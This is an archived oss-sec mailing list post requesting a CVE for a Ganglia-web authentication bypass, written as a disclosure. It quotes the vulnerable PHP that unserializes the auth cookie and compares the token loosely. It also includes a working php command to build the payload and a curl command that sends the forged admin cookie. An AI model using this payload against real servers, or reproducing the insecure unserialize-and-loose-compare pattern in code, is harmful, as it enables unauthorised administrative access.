oss-sec mailing list archives
CVE request: Ganglia-web auth bypass
From: Ivan Novikov <in () wallarm com>
Date: Fri, 04 Sep 2015 20:34:39 +0300
Reported by GitHub: https://github.com/ganglia/ganglia-web/issues/267 It's easy to bypass auth by using boolean serialization like this: $ php -r "echo urlencode(serialize(array('user'=>'admin', 'group'=>'admin', 'token'=>true)));" Vulnerable code listed below: https://github.com/ganglia/ganglia-web/blob/4e98ea69e0e18b388cdc73809ce54843a16ff87b/lib/GangliaAuth.php#L34-L46 if(isSet($_COOKIE['ganglia_auth'])) { $cookie = $_COOKIE['ganglia_auth']; // magic quotes will break unserialization if($this->getMagicQuotesGpc()) { $cookie = stripslashes($cookie); } $data = unserialize($cookie); if(array_keys($data) != array('user','group','token')) { return false; } if($this->getAuthToken($data['user']) == $data['token']) { // Found by d90.andrew // Exploit: curl -H 'Cookie: a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22group%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22token%22%3Bb%3A1%3B%7D' http://ganglia.local/ganglia/
Current thread:
- CVE request: Ganglia-web auth bypass Ivan Novikov (Sep 04)
- Re: CVE request: Ganglia-web auth bypass cve-assign (Sep 05)
- Re: CVE request: Ganglia-web auth bypass Raphael Geissert (Sep 07)